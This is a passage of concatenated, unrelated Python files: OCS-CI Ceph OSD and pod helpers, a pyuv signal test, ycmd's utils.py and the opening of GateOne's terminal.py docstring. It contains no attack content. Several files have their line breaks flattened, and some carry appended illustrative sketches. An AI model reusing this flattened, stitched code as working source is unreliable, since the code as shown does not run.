Delete the ocs-osd-removal job. Args: osd_id (str): The osd id Returns: bool: True, if the ocs-osd-removal job deleted successfully. 
False, otherwise """ ocs_version = config.ENV_DATA["ocs_version"] if Version.coerce(ocs_version) >= Version.coerce("4.7"): job_name = "ocs-osd-removal-job" else: job_name = f"ocs-osd-removal-{osd_id}" osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE) osd_removal_job.delete() try: osd_removal_job.ocp.wait_for_delete(resource_name=job_name) except TimeoutError: logger.warning(f"{job_name} job did not get deleted successfully") return False return True def get_deployment_name(pod_name): """ Get the deployment of the pod. Args: pod_name (str): The pod's name. Returns: The deployment of the specific pod name """ return "-".join(pod_name.split("-")[:-2]) def get_osd_pod_id(osd_pod): """ Get the osd pod id Args: osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object Returns: str: The osd pod id """ return osd_pod.get().get("metadata").get("labels").get("ceph-osd-id") def get_pods_in_statuses(status_options, namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Get all the pods in specific statuses Args: status_options (list): The list of the status options. namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list: All the pods that their status in the 'status_options' list. """ pods = get_all_pods(namespace) ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) pods_in_status_options = list() for p in pods: pod_status = ocp_pod_obj.get_resource_status(p.name) if pod_status in status_options: pods_in_status_options.append(p) return pods_in_status_options def get_pod_ceph_daemon_type(pod_obj): """ Get the ceph daemon type of the pod object Args: pod_obj (Pod): the pod object Returns: str: The pod's ceph daemon type """ return pod_obj.get_labels().get("ceph_daemon_type") def check_pods_after_node_replacement(): """ Check the pods status after the node replacement process. Returns: bool: True if all the pods are running after a specific time. False otherwise. """ are_pods_running = wait_for_pods_to_be_running(timeout=180) if are_pods_running: return True not_ready_statuses = [ constants.STATUS_ERROR, constants.STATUS_PENDING, constants.STATUS_CLBO, constants.STATUS_TERMINATING, ] pods_not_ready = get_pods_in_statuses(status_options=not_ready_statuses) if len(pods_not_ready) == 0: logger.info("All the pods are running") return True if len(pods_not_ready) > 1: logger.warning("More than one pod is not running") return False # if len(pods_not_ready) == 1 pod_not_ready = pods_not_ready[0] pod_daemon_type = get_pod_ceph_daemon_type(pod_not_ready) if pod_daemon_type == constants.MON_DAEMON: logger.info( f"One of the '{pod_daemon_type}' pods is not running, " f"but all the other pods are running" ) timeout = 1500 logger.info( f"waiting another {timeout} seconds for all the pods to be running..." 
) are_pods_running = wait_for_pods_to_be_running(timeout=timeout, sleep=30) if are_pods_running: logger.info("All the pods are running") return True else: logger.warning( f"Not all the pods are in a running state after {timeout} seconds" ) return False else: logger.warning(f"One of the '{pod_daemon_type}' pods is not running") return False def get_osd_pods_having_ids(osd_ids): """ Get the osd pods having specific ids Args: osd_ids (list): The list of the osd ids Returns: list: The osd pods having the osd ids """ # Convert it to set to reduce complexity osd_ids_set = set(osd_ids) osd_pods_having_ids = [] osd_pods = get_osd_pods() for osd_pod in osd_pods: if get_osd_pod_id(osd_pod) in osd_ids_set: osd_pods_having_ids.append(osd_pod) return osd_pods_having_ids def get_pod_objs( pod_names, raise_pod_not_found_error=False, namespace=defaults.ROOK_CLUSTER_NAMESPACE, ): """ Get the pod objects of the specified pod names Args: pod_names (list): The list of the pod names to get their pod objects namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods in the pod names are not found. If False, it ignores the case of pod not found and returns the pod objects of the rest of the pod names. The default value is False Returns: list: The pod objects of the specified pod names Raises: ResourceNotFoundError: If 'raise_pod_not_found_error' is True, and not all the pod names were found """ # Convert it to set to reduce complexity pod_names_set = set(pod_names) pods = get_all_pods(namespace=namespace) pod_objs_found = [p for p in pods if p.name in pod_names_set] if len(pod_names) > len(pod_objs_found): pod_names_found_set = {p.name for p in pod_objs_found} pod_names_not_found = list(pod_names_set - pod_names_found_set) error_message = f"Did not find the following pod names: {pod_names_not_found}" if raise_pod_not_found_error: raise ResourceNotFoundError(error_message) else: logger.info(error_message) return pod_objs_found def wait_for_change_in_pods_statuses( pod_names, current_statuses=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, timeout=300, sleep=20, ): """ Wait for the pod statuses in a specific namespace to change. Args: pod_names (list): List of the pod names to check if their status changed. namespace (str): the namespace ot the pods current_statuses (list): The current pod statuses. These are the pod statuses to check if they changed during each iteration. timeout (int): time to wait for pod statuses to change sleep (int): Time in seconds to sleep between attempts Returns: bool: True, if the pod statuses have changed. 
False, otherwise """ if current_statuses is None: # If 'current_statuses' is None the default value will be the ready statues current_statuses = [constants.STATUS_RUNNING, constants.STATUS_COMPLETED] try: for pod_objs in TimeoutSampler( timeout=timeout, sleep=sleep, func=get_pod_objs, namespace=namespace, pod_names=pod_names, ): ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) if len(pod_objs) < len(pod_names): pod_names_found_set = {p.name for p in pod_objs} pod_names_not_found = list(set(pod_names) - pod_names_found_set) logger.info(f"Some of the pods have not found: {pod_names_not_found}") return True for p in pod_objs: try: pod_status = ocp_pod_obj.get_resource_status(p.name) except CommandFailed as ex: logger.info( f"Can't get the status of the pod {p.name} due to the error: {ex}" ) continue if pod_status not in current_statuses: logger.info( f"The status of the pod '{p.name}' has changed to '{pod_status}'" ) return True except TimeoutExpiredError: logging.info(f"The status of the pods did not change after {timeout} seconds") return False def get_rook_ceph_pod_names(): """ Get all the rook ceph pod names Returns: list: List of the rook ceph pod names """ rook_ceph_pod_names = get_pod_name_by_pattern("rook-ceph-") # Exclude the rook ceph pod tools because it creates by OCS and not rook ceph operator return [ pod_name for pod_name in rook_ceph_pod_names if not pod_name.startswith("rook-ceph-tools-") ] def get_mon_pod_id(mon_pod): """ Get the mon pod id Args: mon_pod (ocs_ci.ocs.resources.pod.Pod): The mon pod object Returns: str: The mon pod id """ return mon_pod.get().get("metadata").get("labels").get("ceph_daemon_id") def delete_all_osd_removal_jobs(namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Delete all the osd removal jobs in a specific namespace Args: namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: bool: True, if all the jobs deleted successfully. False, otherwise """ result = True osd_removal_jobs = get_jobs_with_prefix("ocs-osd-removal-", namespace=namespace) for osd_removal_job in osd_removal_jobs: osd_removal_job.delete() try: osd_removal_job.ocp.wait_for_delete(resource_name=osd_removal_job.name) except TimeoutError: logger.warning( f"{osd_removal_job.name} job did not get deleted successfully" ) result = False return result def get_crashcollector_pods( crashcollector_label=constants.CRASHCOLLECTOR_APP_LABEL, namespace=None ): """ Fetches info about crashcollector pods in the cluster Args: crashcollector_label (str): label associated with mon pods (default: defaults.CRASHCOLLECTOR_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of crashcollector pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] crashcollectors = get_pods_having_label(crashcollector_label, namespace) return [Pod(**crashcollector) for crashcollector in crashcollectors]
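

# A minimal usage sketch, not part of the original module: one plausible way to
# chain the OSD-removal helpers defined above when replacing a failed OSD. The
# flow and the example osd_id are assumptions for illustration; only functions
# defined in this file are used, with the signatures declared above.
def _example_osd_removal_flow(osd_id="0"):
    """Illustrative only: run, verify and clean up an ocs-osd-removal job."""
    # Kick off the removal job for the failed OSD id.
    run_osd_removal_job(osd_ids=[osd_id])
    # Wait for the job to complete and confirm the OSD was purged from the logs.
    assert verify_osd_removal_job_completed_successfully(osd_id)
    # Remove the finished job resource from the cluster.
    assert delete_osd_removal_job(osd_id)
    # Finally, make sure the cluster pods settle back into Running state.
    assert wait_for_pods_to_be_running(timeout=600, sleep=20)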
test_signal.py
import os
import signal
import time
import threading
import unittest

from common import platform_skip, TestCase

import pyuv


@platform_skip(["win32"])
class SignalTest(TestCase):

    def signal_cb(self, handle, signum):
        self.assertEqual(signum, signal.SIGUSR1)
        self.signal_cb_called += 1
        # Wake the loop thread so the handles can be closed there.
        self.async_h.send()

    def async_cb(self, async_h):
        # 'async' is a reserved keyword since Python 3.7, so the Async handle
        # is named async_h rather than async.
        self.async_cb_called += 1
        self.async_h.close()
        self.signal_h.close()

    def test_signal1(self):
        self.async_cb_called = 0
        self.signal_cb_called = 0
        self.async_h = pyuv.Async(self.loop, self.async_cb)
        self.signal_h = pyuv.Signal(self.loop)
        self.signal_h.start(self.signal_cb, signal.SIGUSR1)
        thread = threading.Thread(target=self.loop.run)
        thread.start()
        os.kill(os.getpid(), signal.SIGUSR1)
        thread.join()
        self.assertEqual(self.async_cb_called, 1)
        self.assertEqual(self.signal_cb_called, 1)


@platform_skip(["win32"])
class MultiLoopSignalTest(unittest.TestCase):

    def setUp(self):
        self.lock = threading.Lock()
        self.signal_cb_called = 0

    def signal_cb(self, handle, signum):
        self.assertEqual(signum, signal.SIGUSR1)
        with self.lock:
            self.signal_cb_called += 1
        handle.close()

    def run_loop(self):
        loop = pyuv.Loop()
        signal_h = pyuv.Signal(loop)
        signal_h.start(self.signal_cb, signal.SIGUSR1)
        loop.run()

    def test_multi_loop_signals(self):
        threads = [threading.Thread(target=self.run_loop) for x in range(25)]
        [t.start() for t in threads]
        # Wait until all the loop threads have started and armed their handles
        time.sleep(1)
        os.kill(os.getpid(), signal.SIGUSR1)
        [t.join() for t in threads]
        self.assertEqual(self.signal_cb_called, 25)


if __name__ == '__main__':
    unittest.main(verbosity=2)
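

# A standalone sketch, not part of the original test file: the core pattern
# both tests above rely on. A Signal handle started on a loop catches SIGUSR1,
# and closing the handle from its own callback leaves the loop with no live
# handles, so loop.run() returns and the worker thread can be joined. The
# helper name is an assumption for illustration; POSIX-only, like the tests.
def _example_signal_roundtrip():
    loop = pyuv.Loop()
    state = {"signalled": False}

    def on_signal(handle, signum):
        state["signalled"] = True
        handle.close()  # no handles left to watch, so run() returns

    sig = pyuv.Signal(loop)
    sig.start(on_signal, signal.SIGUSR1)
    thread = threading.Thread(target=loop.run)
    thread.start()
    os.kill(os.getpid(), signal.SIGUSR1)  # deliver the signal to ourselves
    thread.join()
    return state["signalled"]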
utils.py
# encoding: utf-8 # # Copyright (C) 2011-2019 ycmd contributors # # This file is part of ycmd. # # ycmd is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ycmd is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with ycmd. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import # Not installing aliases from python-future; it's unreliable and slow. from builtins import * # noqa from future.utils import PY2, native import copy import json import logging import os import socket import subprocess import sys import tempfile import time import threading LOGGER = logging.getLogger( 'ycmd' ) ROOT_DIR = os.path.normpath( os.path.join( os.path.dirname( __file__ ), '..' ) ) DIR_OF_THIRD_PARTY = os.path.join( ROOT_DIR, 'third_party' ) LIBCLANG_DIR = os.path.join( DIR_OF_THIRD_PARTY, 'clang', 'lib' ) # Idiom to import pathname2url, url2pathname, urljoin, and urlparse on Python 2 # and 3. By exposing these functions here, we can import them directly from this # module: # # from ycmd.utils import pathname2url, url2pathname, urljoin, urlparse # if PY2: from collections import Mapping from urlparse import urljoin, urlparse, unquote from urllib import pathname2url, url2pathname, quote else: from collections.abc import Mapping # noqa from urllib.parse import urljoin, urlparse, unquote, quote # noqa from urllib.request import pathname2url, url2pathname # noqa # We replace the re module with regex as it has better support for characters on # multiple code points. However, this module has a compiled component so we # can't import it in YCM if it is built for a different version of Python (e.g. # if YCM is running on Python 2 while ycmd on Python 3). We fall back to the re # module in that case. try: import regex as re except ImportError: # pragma: no cover import re # noqa # Creation flag to disable creating a console window on Windows. See # https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863.aspx CREATE_NO_WINDOW = 0x08000000 EXECUTABLE_FILE_MASK = os.F_OK | os.X_OK CORE_MISSING_ERROR_REGEX = re.compile( "No module named '?ycm_core'?" ) CORE_PYTHON2_ERROR_REGEX = re.compile( 'dynamic module does not define (?:init|module export) ' 'function \\(PyInit_ycm_core\\)|' 'Module use of python2[0-9]\\.dll conflicts with this version of Python\\.$' ) CORE_PYTHON3_ERROR_REGEX = re.compile( 'dynamic module does not define init function \\(initycm_core\\)|' 'Module use of python3[0-9]\\.dll conflicts with this version of Python\\.$' ) CORE_MISSING_MESSAGE = ( 'ycm_core library not detected; you need to compile it by running the ' 'build.py script. See the documentation for more details.' ) CORE_PYTHON2_MESSAGE = ( 'ycm_core library compiled for Python 2 but loaded in Python 3.' ) CORE_PYTHON3_MESSAGE = ( 'ycm_core library compiled for Python 3 but loaded in Python 2.' ) CORE_OUTDATED_MESSAGE = ( 'ycm_core library too old; PLEASE RECOMPILE by running the build.py script. ' 'See the documentation for more details.' 
) # Exit statuses returned by the CompatibleWithCurrentCore function: # - CORE_COMPATIBLE_STATUS: ycm_core is compatible; # - CORE_UNEXPECTED_STATUS: unexpected error while loading ycm_core; # - CORE_MISSING_STATUS : ycm_core is missing; # - CORE_PYTHON2_STATUS : ycm_core is compiled with Python 2 but loaded with # Python 3; # - CORE_PYTHON3_STATUS : ycm_core is compiled with Python 3 but loaded with # Python 2; # - CORE_OUTDATED_STATUS : ycm_core version is outdated. # Values 1 and 2 are not used because 1 is for general errors and 2 has often a # special meaning for Unix programs. See # https://docs.python.org/2/library/sys.html#sys.exit CORE_COMPATIBLE_STATUS = 0 CORE_UNEXPECTED_STATUS = 3 CORE_MISSING_STATUS = 4 CORE_PYTHON2_STATUS = 5 CORE_PYTHON3_STATUS = 6 CORE_OUTDATED_STATUS = 7 # Python 3 complains on the common open(path).read() idiom because the file # doesn't get closed. So, a helper func. # Also, all files we read are UTF-8. def ReadFile( filepath ): with open( filepath, encoding = 'utf8' ) as f: return f.read() # Returns a file object that can be used to replace sys.stdout or sys.stderr def OpenForStdHandle( filepath ): # Need to open the file in binary mode on py2 because of bytes vs unicode. # If we open in text mode (default), then third-party code that uses `print` # (we're replacing sys.stdout!) with an `str` object on py2 will cause # tracebacks because text mode insists on unicode objects. (Don't forget, # `open` is actually `io.open` because of future builtins.) # Since this function is used for logging purposes, we don't want the output # to be delayed. This means no buffering for binary mode and line buffering # for text mode. See https://docs.python.org/2/library/io.html#io.open if PY2: return open( filepath, mode = 'wb', buffering = 0 ) return open( filepath, mode = 'w', buffering = 1 ) def MakeSafeFileNameString( s ): """Return a representation of |s| that is safe for use in a file name. Explicitly, returns s converted to lowercase with all non alphanumeric characters replaced with '_'.""" def is_ascii( c ): return ord( c ) < 128 return "".join( c if c.isalnum() and is_ascii( c ) else '_' for c in ToUnicode( s ).lower() ) def CreateLogfile( prefix = '' ): with tempfile.NamedTemporaryFile( prefix = prefix, suffix = '.log', delete = False ) as logfile: return logfile.name # Given an object, returns a str object that's utf-8 encoded. This is meant to # be used exclusively when producing strings to be passed to the C++ Python # plugins. For other code, you likely want to use ToBytes below. def ToCppStringCompatible( value ): if isinstance( value, str ): return native( value.encode( 'utf8' ) ) if isinstance( value, bytes ): return native( value ) return native( str( value ).encode( 'utf8' ) ) # Returns a unicode type; either the new python-future str type or the real # unicode type. The difference shouldn't matter. def ToUnicode( value ): if not value: return str() if isinstance( value, str ): return value if isinstance( value, bytes ): # All incoming text should be utf8 return str( value, 'utf8' ) return str( value ) # When lines is an iterable of all strings or all bytes, equivalent to # '\n'.join( ToUnicode( lines ) ) # but faster on large inputs. def JoinLinesAsUnicode( lines ): try: first = next( iter( lines ) ) except StopIteration: return str() if isinstance( first, str ): return ToUnicode( '\n'.join( lines ) ) if isinstance( first, bytes ): return ToUnicode( b'\n'.join( lines ) ) raise ValueError( 'lines must contain either strings or bytes.' 
) # Consistently returns the new bytes() type from python-future. Assumes incoming # strings are either UTF-8 or unicode (which is converted to UTF-8). def ToBytes( value ): if not value: return bytes() # This is tricky. On py2, the bytes type from builtins (from python-future) is # a subclass of str. So all of the following are true: # isinstance(str(), bytes) # isinstance(bytes(), str) # But they don't behave the same in one important aspect: iterating over a # bytes instance yields ints, while iterating over a (raw, py2) str yields # chars. We want consistent behavior so we force the use of bytes(). if type( value ) == bytes: return value # This is meant to catch Python 2's native str type. if isinstance( value, bytes ): return bytes( value, encoding = 'utf8' ) if isinstance( value, str ): # On py2, with `from builtins import *` imported, the following is true: # # bytes(str(u'abc'), 'utf8') == b"b'abc'" # # Obviously this is a bug in python-future. So we work around it. Also filed # upstream at: https://github.com/PythonCharmers/python-future/issues/193 # We can't just return value.encode( 'utf8' ) on both py2 & py3 because on # py2 that *sometimes* returns the built-in str type instead of the newbytes # type from python-future. if PY2: return bytes( value.encode( 'utf8' ), encoding = 'utf8' ) else: return bytes( value, encoding = 'utf8' ) # This is meant to catch `int` and similar non-string/bytes types. return ToBytes( str( value ) ) def ByteOffsetToCodepointOffset( line_value, byte_offset ): """The API calls for byte offsets into the UTF-8 encoded version of the buffer. However, ycmd internally uses unicode strings. This means that when we need to walk 'characters' within the buffer, such as when checking for semantic triggers and similar, we must use codepoint offets, rather than byte offsets. This method converts the |byte_offset|, which is a utf-8 byte offset, into a codepoint offset in the unicode string |line_value|.""" byte_line_value = ToBytes( line_value ) return len( ToUnicode( byte_line_value[ : byte_offset - 1 ] ) ) + 1 def CodepointOffsetToByteOffset( unicode_line_value, codepoint_offset ): """The API calls for byte offsets into the UTF-8 encoded version of the buffer. However, ycmd internally uses unicode strings. This means that when we need to walk 'characters' within the buffer, such as when checking for semantic triggers and similar, we must use codepoint offets, rather than byte offsets. This method converts the |codepoint_offset| which is a unicode codepoint offset into an byte offset into the utf-8 encoded bytes version of |unicode_line_value|.""" # Should be a no-op, but in case someone passes a bytes instance. 
unicode_line_value = ToUnicode( unicode_line_value ) return len( ToBytes( unicode_line_value[ : codepoint_offset - 1 ] ) ) + 1 def GetUnusedLocalhostPort(): sock = socket.socket() # This tells the OS to give us any free port in the range [1024 - 65535] sock.bind( ( '', 0 ) ) port = sock.getsockname()[ 1 ] sock.close() return port def RemoveDirIfExists( dirname ): try: import shutil shutil.rmtree( dirname ) except OSError: pass def RemoveIfExists( filename ): try: os.remove( filename ) except OSError: pass def PathToFirstExistingExecutable( executable_name_list ): for executable_name in executable_name_list: path = FindExecutable( executable_name ) if path: return path return None def _GetWindowsExecutable( filename ): def _GetPossibleWindowsExecutable( filename ): pathext = [ ext.lower() for ext in os.environ.get( 'PATHEXT', '' ).split( os.pathsep ) ] base, extension = os.path.splitext( filename ) if extension.lower() in pathext: return [ filename ] else: return [ base + ext for ext in pathext ] for exe in _GetPossibleWindowsExecutable( filename ): if os.path.isfile( exe ): return exe return None # Check that a given file can be accessed as an executable file, so controlling # the access mask on Unix and if has a valid extension on Windows. It returns # the path to the executable or None if no executable was found. def GetExecutable( filename ): if OnWindows(): return _GetWindowsExecutable( filename ) if ( os.path.isfile( filename ) and os.access( filename, EXECUTABLE_FILE_MASK ) ): return filename return None # Adapted from https://hg.python.org/cpython/file/3.5/Lib/shutil.py#l1081 # to be backward compatible with Python2 and more consistent to our codebase. def FindExecutable( executable ): # If we're given a path with a directory part, look it up directly rather # than referring to PATH directories. This includes checking relative to the # current directory, e.g. ./script if os.path.dirname( executable ): return GetExecutable( executable ) paths = os.environ[ 'PATH' ].split( os.pathsep ) if OnWindows(): # The current directory takes precedence on Windows. curdir = os.path.abspath( os.curdir ) if curdir not in paths: paths.insert( 0, curdir ) for path in paths: exe = GetExecutable( os.path.join( path, executable ) ) if exe: return exe return None def ExecutableName( executable ): return executable + ( '.exe' if OnWindows() else '' ) def ExpandVariablesInPath( path ): # Replace '~' with the home directory and expand environment variables in # path. 
return os.path.expanduser( os.path.expandvars( path ) ) def OnWindows(): return sys.platform == 'win32' def OnCygwin(): return sys.platform == 'cygwin' def OnMac(): return sys.platform == 'darwin' def ProcessIsRunning( handle ): return handle is not None and handle.poll() is None def WaitUntilProcessIsTerminated( handle, timeout = 5 ): expiration = time.time() + timeout while True: if time.time() > expiration: raise RuntimeError( 'Waited process to terminate for {0} seconds, ' 'aborting.'.format( timeout ) ) if not ProcessIsRunning( handle ): return time.sleep( 0.1 ) def CloseStandardStreams( handle ): if not handle: return for stream in [ handle.stdin, handle.stdout, handle.stderr ]: if stream: stream.close() def IsRootDirectory( path, parent ): return path == parent def PathsToAllParentFolders( path ): folder = os.path.normpath( path ) if os.path.isdir( folder ): yield folder while True: parent = os.path.dirname( folder ) if IsRootDirectory( folder, parent ): break folder = parent yield folder def PathLeftSplit( path ): """Split a path as (head, tail) where head is the part before the first path separator and tail is everything after. If the path is absolute, head is the root component, tail everything else. If there is no separator, head is the whole path and tail the empty string.""" drive, path = os.path.splitdrive( path ) separators = '/\\' if OnWindows() else '/' path_length = len( path ) offset = 0 while offset < path_length and path[ offset ] not in separators: offset += 1 if offset == path_length: return drive + path, '' tail = path[ offset + 1 : ].rstrip( separators ) if offset == 0: return drive + path[ 0 ], tail return drive + path[ : offset ], tail # A wrapper for subprocess.Popen that fixes quirks on Windows. def SafePopen( args, **kwargs ): if OnWindows(): # We need this to start the server otherwise bad things happen. # See issue #637. if kwargs.get( 'stdin_windows' ) is subprocess.PIPE: kwargs[ 'stdin' ] = subprocess.PIPE # Do not create a console window kwargs[ 'creationflags' ] = CREATE_NO_WINDOW # Python 2 fails to spawn a process from a command containing unicode # characters on Windows. See https://bugs.python.org/issue19264 and # http://bugs.python.org/issue1759845. # Since paths are likely to contains such characters, we convert them to # short ones to obtain paths with only ascii characters. if PY2: args = ConvertArgsToShortPath( args ) kwargs.pop( 'stdin_windows', None ) return subprocess.Popen( args, **kwargs ) # We need to convert environment variables to native strings on Windows and # Python 2 to prevent a TypeError when passing them to a subprocess. def SetEnviron( environ, variable, value ): if OnWindows() and PY2: environ[ native( ToBytes( variable ) ) ] = native( ToBytes( value ) ) else: environ[ variable ] = value # Convert paths in arguments command to short path ones def ConvertArgsToShortPath( args ): def ConvertIfPath( arg ): if os.path.exists( arg ): return GetShortPathName( arg ) return arg if isinstance( args, str ) or isinstance( args, bytes ): return ConvertIfPath( args ) return [ ConvertIfPath( arg ) for arg in args ] # Get the Windows short path name. 
# Based on http://stackoverflow.com/a/23598461/200291 def GetShortPathName( path ): if not OnWindows(): return path from ctypes import windll, wintypes, create_unicode_buffer # Set the GetShortPathNameW prototype _GetShortPathNameW = windll.kernel32.GetShortPathNameW _GetShortPathNameW.argtypes = [ wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.DWORD ] _GetShortPathNameW.restype = wintypes.DWORD output_buf_size = 0 while True: output_buf = create_unicode_buffer( output_buf_size ) needed = _GetShortPathNameW( path, output_buf, output_buf_size ) if output_buf_size >= needed: return output_buf.value else: output_buf_size = needed # Shim for imp.load_source so that it works on both Py2 & Py3. See upstream # Python docs for info on what this does. def LoadPythonSource( name, pathname ): if PY2: import imp try: return imp.load_source( name, pathname ) except UnicodeEncodeError: # imp.load_source doesn't handle non-ASCII characters in pathname. See # http://bugs.python.org/issue9425 source = ReadFile( pathname ) module = imp.new_module( name ) module.__file__ = pathname exec( source, module.__dict__ ) return module import importlib return importlib.machinery.SourceFileLoader( name, pathname ).load_module() def SplitLines( contents ): """Return a list of each of the lines in the unicode string |contents|.""" # We often want to get a list representation of a buffer such that we can # index all of the 'lines' within it. Python provides str.splitlines for this # purpose. However, this method not only splits on newline characters (\n, # \r\n, and \r) but also on line boundaries like \v and \f. Since old # Macintosh newlines (\r) are obsolete and Windows newlines (\r\n) end with a # \n character, we can ignore carriage return characters (\r) and only split # on \n. return contents.split( '\n' ) def GetCurrentDirectory(): """Returns the current directory as an unicode object. If the current directory does not exist anymore, returns the temporary folder instead.""" try: if PY2: return os.getcwdu() return os.getcwd() # os.getcwdu throws an OSError exception when the current directory has been # deleted while os.getcwd throws a FileNotFoundError, which is a subclass of # OSError. except OSError: return tempfile.gettempdir() def StartThread( func, *args ): thread = threading.Thread( target = func, args = args ) thread.daemon = True thread.start() return thread class HashableDict( Mapping ): """An immutable dictionary that can be used in dictionary's keys. The dictionary must be JSON-encodable; in particular, all keys must be strings.""" def __init__( self, *args, **kwargs ): self._dict = dict( *args, **kwargs ) def __getitem__( self, key ): return copy.deepcopy( self._dict[ key ] ) def __iter__( self ): return iter( self._dict ) def __len__( self ): return len( self._dict ) def __repr__( self ): return '<HashableDict %s>' % repr( self._dict ) def __hash__( self ): try: return self._hash except AttributeError: self._hash = json.dumps( self._dict, separators = ( ',', ':' ), sort_keys = True ).__hash__() return self._hash def __eq__( self, other ): return isinstance( other, HashableDict ) and self._dict == other._dict def __ne__( self, other ): return not self == other def ListDirectory( path ): try: # Path must be a Unicode string to get Unicode strings out of listdir. 
return os.listdir( ToUnicode( path ) ) except Exception: LOGGER.exception( 'Error while listing %s folder', path ) return [] def GetModificationTime( path ): try: return os.path.getmtime( path ) except OSError: LOGGER.exception( 'Cannot get modification time for path %s', path ) return 0 def ExpectedCoreVersion(): return int( ReadFile( os.path.join( ROOT_DIR, 'CORE_VERSION' ) ) ) def LoadYcmCoreDependencies(): for name in ListDirectory( LIBCLANG_DIR ): if name.startswith( 'libclang' ): libclang_path = os.path.join( LIBCLANG_DIR, name ) if os.path.isfile( libclang_path ): import ctypes ctypes.cdll.LoadLibrary( libclang_path ) return def ImportCore(): """Imports and returns the ycm_core module. This function exists for easily mocking this import in tests.""" import ycm_core as ycm_core return ycm_core def ImportAndCheckCore(): """Checks if ycm_core library is compatible and returns with an exit status.""" try: LoadYcmCoreDependencies() ycm_core = ImportCore() except ImportError as error: message = str( error ) if CORE_MISSING_ERROR_REGEX.match( message ): LOGGER.exception( CORE_MISSING_MESSAGE ) return CORE_MISSING_STATUS if CORE_PYTHON2_ERROR_REGEX.match( message ): LOGGER.exception( CORE_PYTHON2_MESSAGE ) return CORE_PYTHON2_STATUS if CORE_PYTHON3_ERROR_REGEX.match( message ): LOGGER.exception( CORE_PYTHON3_MESSAGE ) return CORE_PYTHON3_STATUS LOGGER.exception( message ) return CORE_UNEXPECTED_STATUS try: current_core_version = ycm_core.YcmCoreVersion() except AttributeError: LOGGER.exception( CORE_OUTDATED_MESSAGE ) return CORE_OUTDATED_STATUS if ExpectedCoreVersion() != current_core_version: LOGGER.error( CORE_OUTDATED_MESSAGE ) return CORE_OUTDATED_STATUS return CORE_COMPATIBLE_STATUS def GetClangResourceDir(): resource_dir = os.path.join( LIBCLANG_DIR, 'clang' ) for version in ListDirectory( resource_dir ): return os.path.join( resource_dir, version ) raise RuntimeError( 'Cannot find Clang resource directory.' ) CLANG_RESOURCE_DIR = GetClangResourceDir()
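

# A small illustration, not part of the original module: how the 1-based
# byte/codepoint offset helpers above diverge once a multi-byte character is
# involved. In u'café menu', 'é' is two bytes in UTF-8, so the codepoint
# offset of 'm' is 6 while its byte offset is 7. The sample string and helper
# name are assumptions used purely for demonstration.
def _ExampleOffsetRoundTrip():
  line = u'café menu'
  # 'm' is the 6th codepoint (1-based) but starts at the 7th UTF-8 byte.
  assert CodepointOffsetToByteOffset( line, 6 ) == 7
  assert ByteOffsetToCodepointOffset( line, 7 ) == 6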
terminal.py
# -*- coding: utf-8 -*- # # Copyright 2011 Liftoff Software Corporation # # Meta __version__ = '1.1' __version_info__ = (1, 1) __license__ = "AGPLv3 or Proprietary (see LICENSE.txt)" __author__ = 'Dan McDougall <daniel.mcdougall@liftoffsoftware.com>' __doc__ = """\ About This Module ================= This crux of this module is the Terminal class which is a pure-Python implementation of the quintessential Unix terminal emulator. It does its best to emulate an xterm and along with that comes support for the majority of the relevant portions of ECMA-48. This includes support for emulating varous VT-* terminal types as well as the "linux" terminal type. The Terminal class's VT-* emulation support is not complete but it should suffice for most terminal emulation needs (e.g. all your typical command line programs should work wonderfully). If something doesn't look quite right or you need support for certain modes added please feel free to open a ticket on Gate One's issue tracker: https://github.com/liftoff/GateOne/issues Note that Terminal was written from scratch in order to be as fast as possible. It is extensively commented and implements some interesting patterns in order to maximize execution speed (most notably for things that loop). Some bits of code may seem "un-Pythonic" and/or difficult to grok but understand that this is probably due to optimizations. If you know "a better way" please feel free to submit a patch, open a ticket, or send us an email. There's a reason why open source software is a superior development model! Supported Emulation Types ------------------------- Without any special mode settings or parameters Terminal should effectively emulate the following terminal types: * xterm (the most important one) * ECMA-48/ANSI X3.64 * Nearly all the VT-* types: VT-52, VT-100, VT-220, VT-320, VT-420, and VT-520 * Linux console ("linux") If you want Terminal to support something else or it's missing a feature from any given terminal type please `let us know <https://github.com/liftoff/GateOne/issues/new>`_. We'll implement it! What Terminal Doesn't Do ------------------------ The Terminal class is meant to emulate the display portion of a given terminal. It does not translate keystrokes into escape sequences or special control codes--you'll have to take care of that in your application (or at the client-side like Gate One). It does, however, keep track of many keystroke-specific modes of operation such as Application Cursor Keys and the G0 and G1 charset modes *with* callbacks that can be used to notify your application when such things change. Special Considerations ---------------------- Many methods inside Terminal start with an underscore. This was done to indicate that such methods shouldn't be called directly (from a program that imported the module). If it was thought that a situation might arise where a method could be used externally by a controlling program, the underscore was omitted. Asynchronous Use ---------------- To support asynchronous usage (and make everything faster), Terminal was written to support extensive callbacks that are called when certain events are encountered. Here are the events and their callbacks: .. _callback_constants: ==================================== ================================================================================ Callback Constant (ID) Called when... 
